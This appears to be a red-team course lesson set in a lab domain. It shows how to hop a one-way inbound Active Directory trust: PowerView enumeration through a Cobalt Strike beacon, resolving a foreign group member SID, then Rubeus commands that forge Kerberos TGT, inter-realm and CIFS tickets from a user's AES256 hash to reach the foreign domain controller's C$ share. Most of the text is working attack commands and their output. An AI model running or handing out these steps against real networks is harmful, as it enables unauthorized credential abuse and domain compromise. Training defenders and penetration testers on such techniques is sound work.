One-Way Inbound

dev.cyberbotic.io also has a one-way inbound trust with dev-studio.com.

beacon> powershell Get-DomainTrust

SourceName      : dev.cyberbotic.io
TargetName      : dev-studio.com
TrustType       : WINDOWS_ACTIVE_DIRECTORY
TrustAttributes : 
TrustDirection  : Inbound
WhenCreated     : 8/16/2022 9:52:37 AM
WhenChanged     : 8/16/2022 9:52:37 AM

\

Because the trust is inbound from our perspective, it means that principals in our domain can be granted access to resources in the foreign domain. We can enumerate the foreign domain across the trust.

beacon> powershell Get-DomainComputer -Domain dev-studio.com -Properties DnsHostName

dnshostname      
-----------      
dc.dev-studio.com

\

Get-DomainForeignGroupMember will enumerate any groups that contain users outside of its domain and return its members.

beacon> powershell Get-DomainForeignGroupMember -Domain dev-studio.com

GroupDomain             : dev-studio.com
GroupName               : Administrators
GroupDistinguishedName  : CN=Administrators,CN=Builtin,DC=dev-studio,DC=com
MemberDomain            : dev-studio.com
MemberName              : S-1-5-21-569305411-121244042-2357301523-1120
MemberDistinguishedName : CN=S-1-5-21-569305411-121244042-2357301523-1120,CN=ForeignSecurityPrincipals,DC=dev-studio,DC=com

\

This output shows that there's a member of the domain's built-in Administrators group who is not part of dev-studio.com. The MemberName field contains a SID that can be resolved in our current domain.

beacon> powershell ConvertFrom-SID S-1-5-21-569305411-121244042-2357301523-1120

DEV\Studio Admins

\

This means that members of DEV\Studio Admins are also members of the built-in Administrators group of dev-studio.com and therefore inherit local admin access to dc.dev-studio.com. If this is confusing, this is how it looks from the perspective of the foreign domain controller.

\

\

To hop this trust, we only need to impersonate a member of this Studio Admins domain group.

beacon> powershell Get-DomainGroupMember -Identity "Studio Admins" | select MemberName

MemberName
----------
nlamb

\

To hop a domain trust using Kerberos, we first need an inter-realm key. Obtain a TGT for the target user (here I am using asktgt with their AES256 hash).

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /domain:dev.cyberbotic.io /aes256:a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4 /nowrap

[*] Action: Ask TGT

[*] Using aes256_cts_hmac_sha1 hash: a779fa8afa28d66d155d9d7c14d394359c5d29a86b6417cb94269e2e84c4cee4
[*] Building AS-REQ (w/ preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

doIFwj[...]MuaW8=

\

Next, use that TGT to request a referral ticket from the current domain to the target domain.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:krbtgt/dev-studio.com /domain:dev.cyberbotic.io /dc:dc-2.dev.cyberbotic.io /ticket:doIFwj[...]MuaW8= /nowrap

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'krbtgt/dev-studio.com'
[*] Using domain controller: dc-2.dev.cyberbotic.io (10.10.122.10)
[+] TGS request successful!
[*] base64(ticket.kirbi):

doIFoz[...]NPTQ==

ServiceName              :  krbtgt/DEV-STUDIO.COM
ServiceRealm             :  DEV.CYBERBOTIC.IO
UserName                 :  nlamb
UserRealm                :  DEV.CYBERBOTIC.IO
StartTime                :  9/12/2022 11:13:23 AM
EndTime                  :  9/12/2022 9:11:21 PM
RenewTill                :  9/19/2022 11:11:21 AM
Flags                    :  name_canonicalize, pre_authent, renewable, forwardable
KeyType                  :  rc4_hmac
Base64(key)              :  zfUbwA2B0+aqao7HSvnUgw==

Notice how this inter-realm ticket is of type rc4_hmac even though our TGT was aes256_cts_hmac_sha1. This is the default configuration unless AES has been specifically configured on the trust, so this is not necessarily bad OPSEC.

Finally, use this inter-realm ticket to request TGS's in the target domain. Here, I'm requesting a ticket for CIFS.

beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgs /service:cifs/dc.dev-studio.com /domain:dev-studio.com /dc:dc.dev-studio.com /ticket:doIFoz[...]NPTQ== /nowrap

[*] Action: Ask TGS

[*] Requesting default etypes (RC4_HMAC, AES[128/256]_CTS_HMAC_SHA1) for the service ticket
[*] Building TGS-REQ request for: 'cifs/dc.dev-studio.com'
[*] Using domain controller: dc.dev-studio.com (10.10.150.10)
[+] TGS request successful!
[*] base64(ticket.kirbi):

doIFkD[...]8uY29t

ServiceName              :  cifs/dc.dev-studio.com
ServiceRealm             :  DEV-STUDIO.COM
UserName                 :  nlamb
UserRealm                :  DEV.CYBERBOTIC.IO
StartTime                :  9/12/2022 11:16:46 AM
EndTime                  :  9/12/2022 9:11:21 PM
RenewTill                :  9/19/2022 11:11:21 AM
Flags                    :  name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable
KeyType                  :  aes256_cts_hmac_sha1
Base64(key)              :  V1vCRoRX/9SAFe/ynWQIE9E9DYztP0mk6bg9BRx9Wjk=

\

 beacon> run klist

Current LogonId is 0:0x45bcb0

Cached Tickets: (1)

#0>	Client: nlamb @ DEV.CYBERBOTIC.IO
	Server: cifs/dc.dev-studio.com @ DEV-STUDIO.COM
	KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
	
beacon> ls \\dc.dev-studio.com\c$

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
          dir     08/16/2022 09:15:48   $Recycle.Bin
          dir     08/10/2022 04:55:17   $WinREAgent
          dir     08/10/2022 05:05:53   Boot
          dir     08/18/2021 23:34:55   Documents and Settings
          dir     08/19/2021 06:24:49   EFI
          dir     05/08/2021 08:20:24   PerfLogs
          dir     08/19/2021 06:35:15   Program Files
          dir     08/10/2022 04:06:16   Program Files (x86)
          dir     08/16/2022 09:26:24   ProgramData
          dir     08/16/2022 08:54:23   Recovery
          dir     08/16/2022 09:26:41   System Volume Information
          dir     08/16/2022 08:55:34   Users
          dir     08/16/2022 09:23:25   Windows
 427kb    fil     08/10/2022 05:00:07   bootmgr
 1b       fil     05/08/2021 08:14:33   BOOTNXT
 12kb     fil     09/12/2022 08:36:05   DumpStack.log.tmp
 384mb    fil     09/12/2022 08:36:05   pagefile.sys